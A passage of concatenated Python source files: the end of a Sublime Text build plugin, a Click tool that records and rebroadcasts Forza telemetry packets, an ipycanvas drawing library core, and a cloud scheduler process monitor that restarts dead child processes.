startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
# Set temporary PATH to locate executable in cmd
if path:
old_path = os.environ["PATH"]
# The user decides in the build system whether he wants to append $PATH
# or tuck it at the front: "$PATH;C:\\\\new\\\\path", "C:\\\\new\\\\path;$PATH"
os.environ["PATH"] = os.path.expandvars(path)
proc_env = os.environ.copy()
proc_env.update(env)
for k, v in proc_env.items():
proc_env[k] = os.path.expandvars(v)
if shell_cmd and sys.platform == "win32":
# Use shell=True on Windows, so shell_cmd is passed through with the correct escaping
self.proc = subprocess.Popen(
shell_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=True)
elif shell_cmd and sys.platform == "darwin":
# Use a login shell on OSX, otherwise the users expected env vars won't be setup
self.proc = subprocess.Popen(
["/bin/bash", "-l", "-c", shell_cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=False)
elif shell_cmd and sys.platform == "linux":
# Explicitly use /bin/bash on Linux, to keep Linux and OSX as
# similar as possible. A login shell is explicitly not used for
# linux, as it's not required
self.proc = subprocess.Popen(
["/bin/bash", "-c", shell_cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=False)
else:
# Old style build system, just do what it asks
self.proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=shell)
if path:
os.environ["PATH"] = old_path
if self.proc.stdout:
threading.Thread(target=self.read_stdout).start()
if self.proc.stderr:
threading.Thread(target=self.read_stderr).start()
def kill(self):
if not self.killed:
self.killed = True
if sys.platform == "win32":
# terminate would not kill process opened by the shell cmd.exe,
# it will only kill cmd.exe leaving the child running
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
subprocess.Popen(
"taskkill /PID " + str(self.proc.pid),
startupinfo=startupinfo)
else:
self.proc.terminate()
self.listener = None
def poll(self):
return self.proc.poll() is None
def exit_code(self):
return self.proc.poll()
def read_stdout(self):
while True:
data = os.read(self.proc.stdout.fileno(), 2**15)
if len(data) > 0:
if self.listener:
self.listener.on_data(self, data)
else:
self.proc.stdout.close()
if self.listener:
self.listener.on_finished(self)
break
def read_stderr(self):
while True:
data = os.read(self.proc.stderr.fileno(), 2**15)
if len(data) > 0:
if self.listener:
self.listener.on_data(self, data)
else:
self.proc.stderr.close()
break
class StatiskitCommand(sublime_plugin.WindowCommand, ProcessListener):
BLOCK_SIZE = 2**14
text_queue = collections.deque()
text_queue_proc = None
text_queue_lock = threading.Lock()
proc = None
errs_by_file = {}
phantom_sets_by_buffer = {}
show_errors_inline = True
def run(
self,
cmd=None,
shell_cmd=None,
file_regex="",
line_regex="",
working_dir="",
encoding="utf-8",
env={},
quiet=False,
kill=False,
update_phantoms_only=False,
hide_phantoms_only=False,
word_wrap=True,
syntax="Packages/Text/Plain text.tmLanguage",
# Catches "path" and "shell"
**kwargs):
if update_phantoms_only:
if self.show_errors_inline:
self.update_phantoms()
return
if hide_phantoms_only:
self.hide_phantoms()
return
# clear the text_queue
self.text_queue_lock.acquire()
try:
self.text_queue.clear()
self.text_queue_proc = None
finally:
self.text_queue_lock.release()
if kill:
if self.proc:
self.proc.kill()
self.proc = None
self.append_string(None, "[Cancelled]")
return
if not hasattr(self, 'output_view'):
# Try not to call get_output_panel until the regexes are assigned
self.output_view = self.window.create_output_panel("exec")
# Default the to the current files directory if no working directory was given
if working_dir == "" and self.window.active_view() and self.window.active_view().file_name():
working_dir = os.path.dirname(self.window.active_view().file_name())
self.output_view.settings().set("result_file_regex", file_regex)
self.output_view.settings().set("result_line_regex", line_regex)
self.output_view.settings().set("result_base_dir", working_dir)
self.output_view.settings().set("word_wrap", word_wrap)
self.output_view.settings().set("line_numbers", False)
self.output_view.settings().set("gutter", False)
self.output_view.settings().set("scroll_past_end", False)
self.output_view.assign_syntax(syntax)
# Call create_output_panel a second time after assigning the above
# settings, so that it'll be picked up as a result buffer
self.window.create_output_panel("exec")
self.encoding = encoding
self.quiet = quiet
self.proc = None
if not self.quiet:
if shell_cmd:
print("Running " + shell_cmd)
elif cmd:
print("Running " + " ".join(cmd))
sublime.status_message("Building")
show_panel_on_build = sublime.load_settings("Preferences.sublime-settings").get("show_panel_on_build", True)
if show_panel_on_build:
self.window.run_command("show_panel", {"panel": "output.exec"})
self.hide_phantoms()
self.show_errors_inline = sublime.load_settings("Preferences.sublime-settings").get("show_errors_inline", True)
merged_env = env.copy()
if self.window.active_view():
user_env = self.window.active_view().settings().get('build_env')
if user_env:
merged_env.update(user_env)
# Change to the working dir, rather than spawning the process with it,
# so that emitted working dir relative path names make sense
if working_dir != "":
os.chdir(working_dir)
self.debug_text = ""
if shell_cmd:
self.debug_text += "[shell_cmd: " + shell_cmd + "]\\n"
else:
self.debug_text += "[cmd: " + str(cmd) + "]\\n"
self.debug_text += "[dir: " + str(os.getcwd()) + "]\\n"
if "PATH" in merged_env:
self.debug_text += "[path: " + str(merged_env["PATH"]) + "]"
else:
self.debug_text += "[path: " + str(os.environ["PATH"]) + "]"
try:
# Forward kwargs to AsyncProcess
self.proc = AsyncProcess(cmd, shell_cmd, merged_env, self, **kwargs)
self.text_queue_lock.acquire()
try:
self.text_queue_proc = self.proc
finally:
self.text_queue_lock.release()
except Exception as e:
self.append_string(None, str(e) + "\\n")
self.append_string(None, self.debug_text + "\\n")
if not self.quiet:
self.append_string(None, "[Finished]")
def is_enabled(self, kill=False, **kwargs):
if kill:
return (self.proc is not None) and self.proc.poll()
else:
return True
def append_string(self, proc, str):
self.text_queue_lock.acquire()
was_empty = False
try:
if proc != self.text_queue_proc:
# a second call to exec has been made before the first one
# finished, ignore it instead of intermingling the output.
if proc:
proc.kill()
return
if len(self.text_queue) == 0:
was_empty = True
self.text_queue.append("")
available = self.BLOCK_SIZE - len(self.text_queue[-1])
if len(str) < available:
cur = self.text_queue.pop()
self.text_queue.append(cur + str)
else:
self.text_queue.append(str)
finally:
self.text_queue_lock.release()
if was_empty:
sublime.set_timeout(self.service_text_queue, 0)
def service_text_queue(self):
self.text_queue_lock.acquire()
is_empty = False
try:
if len(self.text_queue) == 0:
# this can happen if a new build was started, which will clear
# the text_queue
return
characters = self.text_queue.popleft()
is_empty = (len(self.text_queue) == 0)
finally:
self.text_queue_lock.release()
self.output_view.run_command(
'append',
{'characters': characters, 'force': True, 'scroll_to_end': True})
if self.show_errors_inline and characters.find('\\n') >= 0:
errs = self.output_view.find_all_results_with_text()
errs_by_file = {}
for file, line, column, text in errs:
if file not in errs_by_file:
errs_by_file[file] = []
errs_by_file[file].append((line, column, text))
self.errs_by_file = errs_by_file
self.update_phantoms()
if not is_empty:
sublime.set_timeout(self.service_text_queue, 1)
def finish(self, proc):
if not self.quiet:
elapsed = time.time() - proc.start_time
exit_code = proc.exit_code()
if exit_code == 0 or exit_code is None:
self.append_string(proc, "[Finished in %.1fs]" % elapsed)
else:
self.append_string(proc, "[Finished in %.1fs with exit code %d]\\n" % (elapsed, exit_code))
self.append_string(proc, self.debug_text)
if proc != self.proc:
return
errs = self.output_view.find_all_results()
if len(errs) == 0:
sublime.status_message("Build finished")
else:
sublime.status_message("Build finished with %d errors" % len(errs))
def on_data(self, proc, data):
try:
characters = data.decode(self.encoding)
at_line = characters.endswith('\\n')
characters = characters.splitlines()
file_regexes = ["^[ ]*File \\"(...*?)\\", line ([0-9]*)",
"^(..[^:]*):([0-9]+):?([0-9]+)?:? error: (.*)$"]
variant_dirs = {'^.*/build/(.*)' : '',
'^build/(.*)' : '',
'^.*/site-packages/(.*)' : 'src/py/',
'^.*/include/statiskit/[^/]*/(.*)' : 'src/cpp/'}
cache = set()
for index in range(len(characters)):
matchline = None
for file_regex in file_regexes:
matchline = re.search(file_regex, characters[index])
if matchline and characters[index] not in cache:
cache.add(characters[index])
file, line = matchline.group(1,2)
for variant_dir in variant_dirs:
matchvariant = re.match(variant_dir, file)
if matchvariant:
file = variant_dirs[variant_dir] + matchvariant.group(1)
if os.path.exists(file):
characters[index] = '[Build error - file \"' + file + '" at line ' + line + ", see build results]\\n" + characters[index]
break
break
if matchline:
break
characters = '\\n'.join(characters)
if at_line:
characters += '\\n'
except:
characters = "[Decode error - output not " + self.encoding + "]\\n"
proc = None
# Normalize newlines, Sublime Text always uses a single \\n separator
# in memory.
characters = characters.replace('\\r\\n', '\\n').replace('\\r', '\\n')
self.append_string(proc, characters)
def on_finished(self, proc):
sublime.set_timeout(functools.partial(self.finish, proc), 0)
def update_phantoms(self):
stylesheet = '''
<style>
div.error {
padding: 0.4rem 0 0.4rem 0.7rem;
margin: 0.2rem 0;
border-radius: 2px;
}
div.error span.message {
padding-right: 0.7rem;
}
div.error a {
text-decoration: inherit;
padding: 0.35rem 0.7rem 0.45rem 0.8rem;
position: relative;
bottom: 0.05rem;
border-radius: 0 2px 2px 0;
font-weight: bold;
}
html.dark div.error a {
background-color: #00000018;
}
html.light div.error a {
background-color: #ffffff18;
}
</style>
'''
for file, errs in self.errs_by_file.items():
view = self.window.find_open_file(file)
if view:
buffer_id = view.buffer_id()
if buffer_id not in self.phantom_sets_by_buffer:
phantom_set = sublime.PhantomSet(view, "exec")
self.phantom_sets_by_buffer[buffer_id] = phantom_set
else:
phantom_set = self.phantom_sets_by_buffer[buffer_id]
phantoms = []
for line, column, text in errs:
pt = view.text_point(line - 1, column - 1)
phantoms.append(sublime.Phantom(
sublime.Region(pt, view.line(pt).b),
('<body id=inline-error>' + stylesheet +
'<div class="error">' +
'<span class="message">' + html.escape(text, quote=False) + '</span>' +
'<a href=hide>' + chr(0x00D7) + '</a></div>' +
'</body>'),
sublime.LAYOUT_BELOW,
on_navigate=self.on_phantom_navigate))
phantom_set.update(phantoms)
def hide_phantoms(self):
for file, errs in self.errs_by_file.items():
view = self.window.find_open_file(file)
if view:
view.erase_phantoms("exec")
self.errs_by_file = {}
self.phantom_sets_by_buffer = {}
self.show_errors_inline = False
def on_phantom_navigate(self, url):
self.hide_phantoms()
class ExecuteEventListener(sublime_plugin.EventListener):
def on_load(self, view):
w = view.window()
if w is not None:
w.run_command('exec', {'update_phantoms_only': True})
"""
def config_paths(*versions):
if len(versions) == 0:
versions = ['2', '3']
configs = []
if SYSTEM == 'linux':
config = os.path.join(os.environ['HOME'], '.config', 'sublime-text-')
elif SYSTEM == 'osx':
config = os.path.join(os.environ['HOME'], 'Library', 'Application Support', 'Sublime Text ')
elif SYSTEM == 'win':
config = os.path.join(s.environ['AppData'], 'Sublime Text ')
for version in versions:
if os.path.exists(config + str(version)):
configs.append(config + str(version))
return configs
|
tools.py
|
import click
import gzip
from json import dumps
from multiprocessing import Manager, Process
import socket
from struct import pack
from yaspin import yaspin
from util.data_looper import DataLooper
from util.data_packet import DataPacket
from workers.recorder import worker
@click.group()
def cli():
'''
Recording and rebroadcasting tools for working with
Forza Data Packets.
'''
@cli.command()
@click.option(
'--game-version',
required=True,
type=click.Choice(['sled', 'dash', 'fh4+'], case_sensitive=False),
help='Version of the Telemetry to receive packets for'
)
@click.option(
'--file-path',
required=True,
help='Path to save the data recording at (ex. recording.json.gz - must be of .json.gz extension)'
)
@click.option(
'--host',
default='0.0.0.0',
help='Address to bind recorder to (ex 127.0.0.1)'
)
@click.option(
'--port',
default=5555,
type=int,
help='Port to bind recorder to (ex. 5555)'
)
def record(game_version, file_path, host, port):
'''
Easily record Forza Data Packets into compressed JSON files so that they
can be reported off of or rebroadcasted at a later date.
'''
# Check the file extension provided
if '.'.join(file_path.split('.')[-2:]) != 'json.gz':
raise Exception(f"File name must be prepended with '.json.gz': {file_path}")
with Manager() as manager:
# Create a shared list and a worker process to handle the actual recording
packets = manager.list()
p = Process(target=worker, args=(packets, game_version, host, port,))
p.start()
# Wait for the worker to start and potentially error out
p.join(0.1)
if not p.is_alive():
print('Error starting worker, most likely a data format issue is occurring.')
return
# Wait for the User to stop recording
input('Press any key when you are ready to stop recording.')
# Terminate the worker process if applicable
try:
p.terminate()
except:
pass
# Ensure some data was recorded
if len(packets) == 0:
print('No data was recorded, not saving to a file.')
return
# Save the packets before closing the Manager (or we lose the values)
with gzip.open(file_path, 'wb') as f:
f.write(dumps(list(packets)).encode('utf-8'))
print('Saved file to:', file_path)
@cli.command()
@click.option(
'--game-version',
required=True,
type=click.Choice(['sled', 'dash', 'fh4+'], case_sensitive=False),
help='Version of the Telemetry to generate packets for'
)
@click.option(
'--host',
required=True,
help='Host where packets are being accepted (ex. 127.0.0.1)',
)
@click.option(
'--port',
required=True,
type=int,
help='Port where packets are being accepted (ex.5555)'
)
@click.option(
'--rate',
default=1000 / 60,
help='Rate at which to send packets (in ms) - default: 16.6666 (1000 / 60 - 60hz)'
)
@click.option(
'--input-file',
required=True,
help='Sample data use in the rebroadcast'
)
def rebroadcast(game_version, host, port, rate, input_file):
'''
Rebroadcast recorded Forza Data Packets to an endpoint at a specified
rate. Recordings are backwards compatible, however, they are not forward
compatible. You can record 'fh4+' packets and rebroadcast them for the
'sled' packet type and the code will automatically truncate the data as
needed, but for example you cannot use a 'sled' recording for the 'dash'
game version as it is missing required fields.
'''
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set the format for the game version
if game_version == 'sled':
data_format = DataPacket._default_format
elif game_version == 'dash':
data_format = DataPacket._dash_format
elif game_version == 'fh4+':
data_format = DataPacket._horizon_format
# Loop data until canceled
packets_sent = 0
with yaspin(color='green') as spinner:
for row in DataLooper(input_file, rate):
# Prevent older recordings being used on newer versions
if game_version == 'dash':
if len(row) == 58:
raise Exception('Data is of "sled" format but game version was set to "dash".')
elif game_version == 'fh4+' and len(row) != 89:
data_type = 'unknown'
if len(row) == 58:
data_type = 'sled'
elif len(row) == 85:
data_type = 'dash'
raise Exception(f'Data is of type "{data_type}" but game version was set to "fh4+".')
# Truncate the data as needed for older versions for backwards compatibility
if len(row) == 89: # FH4+ field length
if game_version == 'sled':
row = row[0:58]
elif game_version == 'dash':
row = row[0:58] + row[61:88]
# Send data packet
sock.sendto(pack(data_format, *row), (host, port))
packets_sent += 1
spinner.text = f'{packets_sent:,} packets sent in total'
# If the loop exits, close the socket if necessary
sock.close()
if __name__ == '__main__':
cli()
|
core.py
|
# from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic)
# Limitations:
# -> Cannot update canvas width / height by updating the global variables width / height.
# Need to use size() method or canvas object.
import threading
import time
from math import pi
import re
from IPython.display import Code, display
from ipycanvas import Canvas, hold_canvas
from ipywidgets import Button
from ipyevents import Event
from .util import IpyExit
from .util.decorators import extern, _ignite_globals, ignite_global
DEFAULT_CANVAS_SIZE = (100, 100)
FRAME_RATE = 30
NO_ACTIVITY_THRESHOLD = 5 * 60 # 5 minutes
_sparkplug_active_thread_id = None
_sparkplug_last_activity = 0
_sparkplug_running = False
class Core:
# All constants that will be injected into global scope in the user"s cell
global_constants = {
"pi": pi
}
ignite_globals = _ignite_globals
def __init__(self, globals_dict):
self.status_text = display(Code(""), display_id=True)
self._globals_dict = globals_dict
self._methods = {}
self.stop_button = Button(description="Stop")
self.stop_button.on_click(self.on_stop_button_clicked)
self._globals_dict["canvas"] = Canvas()
self.kb_mon = Event(source=self.canvas, watched_events=['keydown', 'keyup'], wait=1000 // FRAME_RATE,
prevent_default_actions=True)
self.output_text = ""
self.color_strings = {
"default": "#888888"
}
match_255 = r"(?:(?:2(?:(?:5[0-5])|(?:[0-4][0-9])))|(?:[01]?[0-9]{1,2}))"
match_alpha = r"(?:(?:1(?:\.0*)?)|(?:0(?:\.[0-9]*)?))"
match_360 = r"(?:(?:3[0-5][0-9])|(?:[0-2]?[0-9]{1,2}))"
match_100 = r"(?:100|[0-9]{1,2})"
self.regexes = [
re.compile(r"#[0-9A-Fa-f]{6}"),
re.compile(r"rgb\({},{},{}\)".format(match_255, match_255, match_255)),
re.compile(r"rgba\({},{},{},{}\)".format(match_255, match_255, match_255, match_alpha)),
re.compile(r"hsl\({},{}%,{}%\)".format(match_360, match_100, match_100)),
re.compile(r"hsla\({},{}%,{}%,{}\)".format(match_360, match_100, match_100, match_alpha))
]
self.width, self.height = DEFAULT_CANVAS_SIZE
self.mouse_x = 0
self.mouse_y = 0
self.mouse_is_pressed = False
self.key = ""
self._keys_held = {}
# Settings for drawing text (https://ipycanvas.readthedocs.io/en/latest/drawing_text.html).
self.font_settings = {
'size': 12.0,
'font': 'sans-serif',
'baseline': 'top',
'align': 'left'
}
### Properties ###
@property
@ignite_global
def canvas(self) -> Canvas:
return self._globals_dict["canvas"]
@property
@ignite_global
def mouse_x(self):
return self._globals_dict["mouse_x"]
@mouse_x.setter
def mouse_x(self, val):
self._globals_dict["mouse_x"] = val
@property
@ignite_global
def mouse_y(self):
return self._globals_dict["mouse_y"]
@mouse_y.setter
def mouse_y(self, val):
self._globals_dict["mouse_y"] = val
@property
@ignite_global
def mouse_is_pressed(self):
return self._globals_dict["mouse_is_pressed"]
@mouse_is_pressed.setter
def mouse_is_pressed(self, val):
self._globals_dict["mouse_is_pressed"] = val
@property
@ignite_global
def key(self):
return self._globals_dict["key"]
@key.setter
def key(self, val):
self._globals_dict["key"] = val
@property
@ignite_global
def width(self):
return self._globals_dict["width"]
@width.setter
def width(self, val):
self._globals_dict["width"] = val
self.canvas.width = val
@property
@ignite_global
def height(self):
return self._globals_dict["height"]
@height.setter
def height(self, val):
self._globals_dict["height"] = val
self.canvas.height = val
### Library init ###
# Updates last activity time
@staticmethod
def refresh_last_activity():
global _sparkplug_last_activity
_sparkplug_last_activity = time.time()
# Creates canvas and starts thread
def start(self, methods):
self._methods = methods
draw = self._methods.get("draw", None)
if draw:
self.print_status("Running...")
display(self.stop_button)
display(self.canvas)
self.output_text_code = display(Code(self.output_text), display_id=True)
self.canvas.on_mouse_down(self.on_mouse_down)
self.canvas.on_mouse_up(self.on_mouse_up)
self.canvas.on_mouse_move(self.on_mouse_move)
self.kb_mon.on_dom_event(self.handle_kb_event)
# Initialize text drawing settings for the canvas. ()
self.canvas.font = f"{self.font_settings['size']}px {self.font_settings['font']}"
self.canvas.text_baseline = 'top'
self.canvas.text_align = 'left'
thread = threading.Thread(target=self.loop)
thread.start()
def stop(self, message="Stopped"):
global _sparkplug_running
if not _sparkplug_running:
return
_sparkplug_running = False
self.print_status(message)
self.kb_mon.reset_callbacks()
self.kb_mon.close()
# Assuming we're using IPython to draw the canvas through the display() function.
# Commenting this out for now, it throws exception since it does not derive BaseException
# raise IpyExit
# Loop method that handles drawing and setup
def loop(self):
global _sparkplug_active_thread_id, _sparkplug_running
# Set active thread to this thread. This will stop any other active thread.
current_thread_id = threading.current_thread().native_id
_sparkplug_active_thread_id = current_thread_id
_sparkplug_running = True
self.refresh_last_activity()
draw = self._methods.get("draw", None)
setup = self._methods.get("setup", None)
if setup:
try:
setup()
except Exception as e:
self.stop("Error in setup() function: " + str(e))
return
while _sparkplug_running:
if _sparkplug_active_thread_id != current_thread_id \
or time.time() - _sparkplug_last_activity > NO_ACTIVITY_THRESHOLD:
self.stop("Stopped due to inactivity")
return
if not draw:
self.stop("Done drawing.")
return
with hold_canvas(self.canvas):
try:
draw()
except Exception as e:
self.stop("Error in draw() function: " + str(e))
return
time.sleep(1 / FRAME_RATE)
# Prints status to embedded error box
def print_status(self, msg):
self.status_text.update(Code(msg))
# Prints output to embedded output box
# Can't use @validate_args decorator for functions actually accepting variable arguments
@ignite_global
def print(self, *args, sep=' ', end='\n', flush=True):
global _sparkplug_running
self.output_text += sep.join([str(arg) for arg in args]) + end
if _sparkplug_running and flush:
self.output_text_code.update(Code(self.output_text))
# Update mouse_x, mouse_y, and call mouse_down handler
def on_mouse_down(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
self.mouse_is_pressed = True
mouse_down = self._methods.get("mouse_down", None)
if mouse_down:
mouse_down()
# Update mouse_x, mouse_y, and call mouse_up handler
def on_mouse_up(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
self.mouse_is_pressed = False
mouse_up = self._methods.get("mouse_up", None)
if mouse_up:
mouse_up()
# Update mouse_x, mouse_y, and call mouse_moved handler
def on_mouse_move(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
mouse_moved = self._methods.get("mouse_moved", None)
if mouse_moved:
mouse_moved()
def on_stop_button_clicked(self, button):
self.stop()
@extern
def handle_kb_event(self, event): pass
### User overrideable functions ###
# The function bodies here do not matter, they are discarded
@ignite_global(mutable=True)
def setup(self): pass
@ignite_global(mutable=True)
def draw(self): pass
@ignite_global(mutable=True)
def mouse_up(self): pass
@ignite_global(mutable=True)
def mouse_down(self): pass
@ignite_global(mutable=True)
def mouse_moved(self): pass
@ignite_global(mutable=True)
def key_pressed(self): pass
@ignite_global(mutable=True)
def key_released(self): pass
@ignite_global(mutable=True)
def key_repeated(self): pass
### Global functions ###
# From .util.helper_functions.keyboard_functions
@extern
def keys_held(self, *args): pass
@extern
def key_held(self, *args): pass
# From .util.helper_functions.canvas_functions
@extern
def size(self, *args): pass
@extern
def fill_style(self): pass
@extern
def stroke_style(self, *args): pass
@extern
def clear(self, *args): pass
@extern
def background(self, *args): pass
# From util.helper_functions.rect_functions
@extern
def rect(self, *args): pass
@extern
def fill_rect(self, *args): pass
@extern
def stroke_rect(self, *args): pass
@extern
def clear_rect(self, *args): pass
# From util.helper_functions.square_functions
@extern
def square(self, *args): pass
@extern
def stroke_square(self, *args): pass
@extern
def fill_square(self, *args): pass
# From util.helper_functions.circle_functions
@extern
def circle(self, *args): pass
@extern
def fill_circle(self, *args): pass
@extern
def stroke_circle(self, *args): pass
# From util.helper_functions.ellipse_functions
@extern
def ellipse(self, *args): pass
@extern
def fill_ellipse(self, *args): pass
@extern
def stroke_ellipse(self, *args): pass
# From util.helper_functions.arc_functions
@extern
def arc(self, *args): pass
@extern
def fill_arc(self, *args): pass
@extern
def stroke_arc(self, *args): pass
# From util.helper_functions.triangle_functions
@extern
def triangle(self, *args): pass
@extern
def fill_triangle(self, *args): pass
@extern
def stroke_triangle(self, *args): pass
# From util.helper_functions.text_functions
@extern
def text_size(self, *args): pass
@extern
def text_align(self, *args): pass
@extern
def text(self, *args): pass
# From util.helper_functions.line_functions
@extern
def draw_line(self, *args): pass
@extern
def line(self, *args): pass
@extern
def line_width(self, *args): pass
# An alias to line_width
@extern
def stroke_width(self, *args): pass
# From util.helper_functions.image_functions
@extern
def image(self, *args): pass
### Helper Functions ###
# From util.helper_functions.misc_functions
@extern
def parse_color(self, *args, func_name="parse_color"): pass
@extern
def color(self, *args): pass
@extern
def parse_color_string(self, func_name, s): pass
@extern
def arc_args(self, *args): pass
@extern
def random(self, *args): pass
@extern
def randint(self, *args): pass
@extern
def bounding_box(self, *args): pass
@extern
def collided(self, *args): pass
@extern
def axis_overlapped(self, *args): pass
|
ProcessMonitor.py
|
import multiprocessing
from multiprocessing import Process
import logging
import time
import datetime
import subprocess
import psutil
import os
import sys
from cloudscheduler.lib.db_config import Config
class ProcessMonitor:
config = None
processes = {}
process_ids = {}
static_process_ids = {}
dynamic_process_ids = {}
logging = None
log_file = None
log_level = None
def __init__(self, config_params, pool_size, process_ids=None, config_file='/etc/cloudscheduler/cloudscheduler.yaml', log_file=None, log_level=None, log_key=None):
self.config = Config(config_file, config_params, pool_size=pool_size)
if log_file is None:
if log_key is not None:
self.log_file = self.config.__dict__[log_key]["log_file"]
else:
self.log_file = self.config.categories[os.path.basename(sys.argv[0])]["log_file"]
else:
self.log_file = log_file
if log_level is None:
if log_key is not None:
self.log_level = self.config.__dict__[log_key]["log_level"]
else:
self.log_level = self.config.categories[os.path.basename(sys.argv[0])]["log_level"]
else:
self.log_level = log_level
logging.basicConfig(
filename=self.log_file,
level=self.log_level,
format='%(asctime)s - %(processName)-12s - %(process)d - %(levelname)s - %(message)s')
self.logging = logging.getLogger()
self.process_ids = process_ids
for proc in process_ids:
if isinstance(process_ids[proc], list):
# add dynamic process
function = process_ids[proc][0]
select = process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
#process rows
for row in rows:
logging.debug("Parsing csv2_cloud row: %s" % row)
target_group = row["group_name"]
target_cloud = row["cloud_name"]
dyna_proc = {
"function": function,
"args": [target_group, target_cloud],
"process": None
}
self.dynamic_process_ids[proc + "-" + target_group + "-" + target_cloud] = dyna_proc
else:
#something wrong with the select
self.logging.error("Failed to retrieve child targets from select statement:%s \n Error: %s" % (select, msg))
self.config.db_close()
else:
# its a static process
logging.debug("Adding static process: %s" % process_ids[proc])
self.static_process_ids[proc] = process_ids[proc]
def get_process_ids(self):
return self.process_ids
def add_process_id(self, process_id, function):
self.process_ids[process_id] = function
_init_cpu_sleep_time(process_id)
return
def del_process(self, process_id, dynamic=False):
proc = self.processes.get(process_id)
if proc:
logging.info("Deleting process: %s" % process_id)
#if self.is_alive(process_id):
#proc.join()
del self.processes[process_id]
if dynamic:
self.dynamic_process_ids.pop(process_id)
else:
self.process_ids.pop(process_id)
self.static_process_ids.pop(process_id)
return
def get_logging(self):
return self.logging
def get_config(self):
return self.config
def start_all(self):
# start static_ids
for process in self.static_process_ids:
if process not in self.processes or not self.processes[process].is_alive():
if process in self.processes:
logging.error("Restarting %s...", process)
else:
logging.info("Starting %s...", process)
self.processes[process] = Process(target=self.process_ids[process])
self.processes[process].start()
# start dynamic_ids
for process in self.dynamic_process_ids:
if process not in self.processes or not self.processes[process].is_alive():
if process in self.processes:
logging.error("Restarting %s...", process)
else:
logging.info("Starting %s...", process)
# key here should be function-group-cloud
self.processes[process] = Process(target=self.dynamic_process_ids[process]["function"], args = (self.dynamic_process_ids[process]["args"],))
self.processes[process].start()
def restart_process(self, process, dynamic=False):
# Capture tail of log when process has to restart
try:
proc = subprocess.Popen(['tail', '-n', '50', self.config.categories[os.path.basename(sys.argv[0])]["log_file"]], stdout=subprocess.PIPE)
lines = proc.stdout.readlines()
timestamp = str(datetime.date.today())
with open(''.join([self.log_file, '-crash-', timestamp]), 'wb') as f:
for line in lines:
f.write(line)
except Exception as ex:
self.logging.exception(ex)
if dynamic:
self.processes[process] = Process(target=self.dynamic_process_ids[process]["function"], args = (self.dynamic_process_ids[process]["args"],))
self.processes[process].start()
else:
self.processes[process] = Process(target=self.process_ids[process])
self.processes[process].start()
def is_alive(self, process):
return self.processes[process].is_alive()
def kill_join_all(self):
for proc in self.processes:
pro = self.processes[proc]
try:
pro.terminate()
pro.join()
self._cleanup_event_pids(proc)
except:
logging.error("failed to join process %s", pro.name)
def join_all(self):
for proc in self.processes:
pro = self.processes[proc]
try:
pro.join()
except:
logging.error("failed to join process %s", pro.name)
def check_processes(self, stop=False):
if stop and len(self.process_ids) == 0:
logging.info("Stop set and all children shut down, exiting...")
exit(0)
if stop:
for proc in self.process_ids:
if isinstance(self.process_ids[proc], list):
function = self.process_ids[proc][0]
select = self.process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
for row in rows:
target_group = row["group_name"]
target_cloud = row["cloud_name"]
proc_key = proc + "-" + target_group + "-" + target_cloud
if proc_key in self.processes and self.is_alive(proc_key):
logging.info("Stop dynamic set, terminating child: %s" % proc)
self.processes[proc].terminate()
else:
self.logging.error("Failed to retrieve child targets from select statement: %s" % msg)
self.config.db_close()
elif self.is_alive(proc):
logging.info("Stop static set, terminating child: %s" % proc)
self.processes[proc].terminate()
procs_to_remove = []
# handle static processes
for process in self.static_process_ids:
if process not in self.processes or not self.is_alive(process):
if stop:
# child proc is dead, and stop flag set, don't restart and remove proc id
procs_to_remove.append(process)
if process in self.processes:
del self.processes[process]
continue
if process in self.processes:
logging.error("%s process died, restarting...", process)
logging.debug("exit code: %s" , self.processes[process].exitcode)
# self.config.update_service_catalog(error="%s process died, exit code: %s" % (process, self.processes[process].exitcode))
self.config.update_service_catalog(host_id=self.config.local_host_id, error="%s process died, exit code: %s" % (process, self.processes[process].exitcode))
del self.processes[process]
else:
self.logging.info("Restarting %s process", process)
#self._cleanup_event_pids(process)
self.restart_process(process)
time.sleep(self.config.categories["ProcessMonitor"]["sleep_interval_main_short"])
p = psutil.Process(self.processes[process].pid)
# handle dynamic processes
dynamic_procs = self.dynamic_process_ids.keys()
dynamic_procs_set = set(dynamic_procs)
for proc in self.process_ids:
#check if its a list
if isinstance(self.process_ids[proc], list):
#TODO ADD STOP LOGIC
# add dynamic process
function = self.process_ids[proc][0]
select = self.process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
#process rows
for row in rows:
target_group = row["group_name"]
target_cloud = row["cloud_name"]
# check if process already in our list, if it is check if it's alive
proc_key = proc + "-" + target_group + "-" + target_cloud
if proc_key in dynamic_procs_set:
dynamic_procs_set.remove(proc_key)
if proc_key in self.processes:
#check if it's alive
if not self.is_alive(proc_key) and not stop:
#restart it
logging.error("%s process died, restarting...", proc_key)
self.config.update_service_catalog(host_id=self.config.local_host_id, error="%s process died, exit code: %s" % (proc_key, self.processes[proc_key].exitcode))
self.restart_process(proc_key, dynamic=True)
else:
#else create a new thread
dyna_proc = {
"function": function,
"args": [target_group, target_cloud],
"process": None
}
self.dynamic_process_ids[proc + "-" + target_group + "-" + target_cloud] = dyna_proc
else:
#something wrong with the select
